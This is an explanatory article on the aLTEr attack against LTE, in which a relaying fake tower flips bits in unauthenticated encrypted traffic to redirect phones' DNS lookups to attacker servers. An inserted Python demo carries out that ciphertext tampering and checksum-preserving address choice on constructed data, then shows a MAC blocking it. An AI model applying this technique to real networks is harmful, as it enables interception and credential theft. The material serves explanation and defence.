Modern Cell Networks are Vulnerable to Nasty LTE Exploit

LTE is one of the most common cellular network technologies in the world right now. If you used your smartphone today, it’s highly likely that you used an LTE network. LTE networks are deployed in most countries worldwide, and countries such as the United States, South Korea, and Japan have over 90% LTE penetration.

My phone definitely uses LTE. I use a VPN for my phone, and I make sure that I use HTTPS instead of HTTP on the web as much as possible. Here’s a good reason why: a new LTE exploit has been discovered which puts your phone and its sensitive data at risk. It was discovered by researchers David Rupprecht, Katharina Kohls, Thorsten Holz, and Christina Pöpper from Ruhr-Universität Bochum and New York University Abu Dhabi.

As reported in The Register:

“Senator Wyden asked whether the DHS has the capability to detect 4G/LTE IMSI catchers, capable of surveilling recent model phones. The NPPD responded that it's not aware how it would detect such technology and that if detection tech exists. According to the American Civil Liberties Union, 73 agencies in 25 states and the District of Columbia own IMSI catchers, though the advocacy organization suggests the devices may be more widespread because government agencies often conceal such purchases. As for the number of devices operated by foreign spies and the like, that's still being worked out.”

And IMSI catchers are just one type of fake cellular tower device that can be purchased by criminals from the black market.

Here’s How the aLTEr Exploit Works

The researchers call the exploit “aLTEr,” and here’s how they introduce it in their paper:

“Previous work on LTE protocol security identified crucial attack vectors for both the physical (layer one) and network (layer three) layers. Data link layer (layer two) protocols, however, remain a blind spot in existing LTE security research.”

First, a cyber attacker needs to deploy a fake cellular tower. Fake cell towers are actually quite common. IMSI catchers are one type of fake cell tower device, and they can be purchased. Washington DC alone probably has lots of them. The aLTEr tower is a bit more than a plain IMSI catcher, though: it relays the victim's traffic to and from the real network, which is what lets it sit in the middle of the connection.

So, the attacker deploys a fake cell tower, which can then target any phone within its signal radius. The researchers believe that the fake cell towers that can be used to execute an aLTEr attack may have a range of up to two kilometres. In an urban area like my hometown of Toronto, any of thousands of phones could potentially be attacked using this method.

Like conventional computer networks, cellular networks can be divided according to the OSI layer model. The aLTEr exploit targets Layer 2, the data link layer of an LTE connection. That layer corrects transmission errors, organizes multiuser network access, and encrypts data. In LTE, layer three has mutual authentication, which prevents the phone from connecting to a malicious network. But the user data carried on layer two is only encrypted, not integrity protected, so a relay that sits between the phone and the real tower can alter it without anyone noticing.

Types of aLTEr Exploit Attacks

aLTEr can exploit the data link layer to conduct malicious activities such as redirecting packets which were destined for legitimate websites to phishing websites which can steal user credentials.

LTE networks deployed by major telecommunications providers can be spoofed into thinking that the fake tower is a legitimate user: toward the real network, the attacker's relay behaves like the victim's phone. Meanwhile, the targeted smartphone thinks that the fake cell tower is a legitimate base station, and the user is none the wiser.

If the cyber attacker knows the plaintext of part of a packet (for example, the IP address of the DNS server the phone uses), they can change those bytes even though the packet is encrypted. LTE encrypts user data in counter mode, which XORs the data with a keystream, so flipping a bit in the ciphertext flips the same bit in the decrypted plaintext. Because the data link layer carries no integrity check, the modification is not detected.

Modifying the destination address in the IP header enables DNS spoofing: the phone's DNS requests are silently redirected to a DNS server that's under the cyber attacker's control. Through the malicious DNS server, the attacker can answer name lookups with the IP addresses of their own malicious Internet servers, and that covers more than web servers. Any Internet service which resolves domain names may be vulnerable.

Through an attacker's malicious Internet servers, malware can be sent, man-in-the-middle attacks (MITM) can be performed, and sensitive credentials can be stolen. Because the weakness is in the LTE specification itself rather than in one vendor's implementation, there is no patch for it, and it gives a way to single out individual LTE users, especially high value targets like politicians and celebrities. aLTEr's victims do need to be specifically targeted, though; it is not a mass attack.
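To make the "modify encrypted headers" step concrete, here is an added, self-contained Python example; it is not code from the page or from the researchers, and everything in it is constructed for illustration. It encrypts an IPv4 header with a counter-mode style keystream (an HMAC-based stand-in for LTE's AES-CTR, which shares the XOR property the attack relies on), then shows an attacker who knows only the phone's DNS server address (assumed to be 10.0.0.53) rewriting the destination in the ciphertext so the packet decrypts to an attacker-chosen resolver. It also shows one way to keep the IP checksum valid without knowing the rest of the header: choosing an attacker address whose 16-bit halves sum to the same value as the original (an assumption of this example, not a claim about the researchers' method). The last function adds a message authentication code over the ciphertext, the fix the researchers recommend, and shows the same tampering being rejected.

```python
import hashlib
import hmac
import ipaddress
import struct

# Constructed keys for the demo; in LTE the keys derive from the AKA run.
ENC_KEY = hashlib.sha256(b"constructed demo encryption key").digest()
MAC_KEY = hashlib.sha256(b"constructed demo integrity key").digest()
NONCE = b"\x00" * 8          # stand-in for the PDCP COUNT/bearer/direction input
DST_OFFSET = 16              # destination address field inside the IPv4 header


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Counter-mode keystream built from HMAC-SHA256(nonce || counter).
    A stand-in for AES-CTR: any counter-mode cipher XORs data with a keystream."""
    out, counter = b"", 0
    while len(out) < length:
        out += hmac.new(key, nonce + struct.pack(">I", counter), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def ctr_crypt(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Encrypt and decrypt are the same operation in counter mode."""
    return xor_bytes(data, keystream(key, nonce, len(data)))


def ones_complement_sum(data: bytes) -> int:
    """RFC 1071 ones' complement sum of 16-bit words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(">%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total


def ipv4_header(src: str, dst: str, payload_len: int, ident: int, proto: int = 17) -> bytes:
    """Build a 20-byte IPv4 header (UDP by default) with a correct checksum."""
    hdr = struct.pack(">BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, ident, 0x4000, 64, proto, 0,
                      ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    csum = (~ones_complement_sum(hdr)) & 0xFFFF
    return hdr[:10] + struct.pack(">H", csum) + hdr[12:]


def header_checksum_ok(hdr: bytes) -> bool:
    return ones_complement_sum(hdr) == 0xFFFF


def checksum_neutral_ip(known_dst: str, prefix: tuple) -> str:
    """Pick an address in the attacker's /16 whose two 16-bit halves have the same
    ones' complement sum as known_dst, so swapping it in leaves the IP checksum
    (and the UDP pseudo-header checksum) valid without knowing the other fields."""
    target = ones_complement_sum(ipaddress.IPv4Address(known_dst).packed)
    hi = (prefix[0] << 8) | prefix[1]
    lo = (target - hi) % 0xFFFF
    return str(ipaddress.IPv4Address(struct.pack(">HH", hi, lo)))


def alter_ciphertext_dst(ciphertext: bytes, known_dst: str, new_dst: str) -> bytes:
    """The aLTEr step: XOR (old_dst ^ new_dst) into the ciphertext at the destination
    field. Only knowledge of the original plaintext at that offset is needed."""
    mask = xor_bytes(ipaddress.IPv4Address(known_dst).packed,
                     ipaddress.IPv4Address(new_dst).packed)
    patched = bytearray(ciphertext)
    for i, m in enumerate(mask):
        patched[DST_OFFSET + i] ^= m
    return bytes(patched)


def mac_tag(key: bytes, ciphertext: bytes) -> bytes:
    """Integrity tag over the ciphertext, i.e. the MAC the researchers recommend."""
    return hmac.new(key, ciphertext, hashlib.sha256).digest()


def run_demo() -> dict:
    phone_dns = "10.0.0.53"                        # assumed known to the attacker
    attacker_dns = checksum_neutral_ip(phone_dns, (10, 1))
    # Constructed DNS request header: 40-byte UDP payload, ID chosen by the phone.
    plain = ipv4_header("10.20.30.40", phone_dns, payload_len=40, ident=0xBEEF)
    ct = ctr_crypt(ENC_KEY, NONCE, plain)
    tag = mac_tag(MAC_KEY, ct)                     # only used in the "with MAC" check
    tampered = alter_ciphertext_dst(ct, phone_dns, attacker_dns)
    decrypted = ctr_crypt(ENC_KEY, NONCE, tampered)
    return {
        "attacker_dns": attacker_dns,
        "decrypted_dst": str(ipaddress.IPv4Address(decrypted[DST_OFFSET:DST_OFFSET + 4])),
        "checksum_ok": header_checksum_ok(decrypted),
        "other_fields_intact": decrypted[:DST_OFFSET] == plain[:DST_OFFSET],
        "mac_accepts_tampered": hmac.compare_digest(mac_tag(MAC_KEY, tampered), tag),
    }


if __name__ == "__main__":
    print(run_demo())
```

Without the tag, the phone's network stack sees a correctly checksummed packet addressed to 10.1.0.52 and forwards it; with the tag checked before decryption, the same packet is dropped. In the real attack the relay also has to rewrite the resolver's source address back to the original on the downlink so the phone accepts the reply, and the same XOR trick applies there.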

HTTPS and VPNs Can Mitigate These Attacks

LTE is considered to be a 4G cell technology. Is 5G vulnerable to similar attacks? Here’s what the researchers have to say:

“The use of authenticated encryption would prevent the aLTEr attack, which can be achieved through the addition of message authentication codes to user plane packets. However, the current 5G specification does not require this security feature as mandatory, but leaves it as optional configuration parameter.”

The researchers contacted the GSMA on March 1, and the GSMA then informed network providers about the aLTEr vulnerability. That makes it more likely that new 5G network deployments will turn on the optional integrity protection and be less vulnerable to exploits like aLTEr.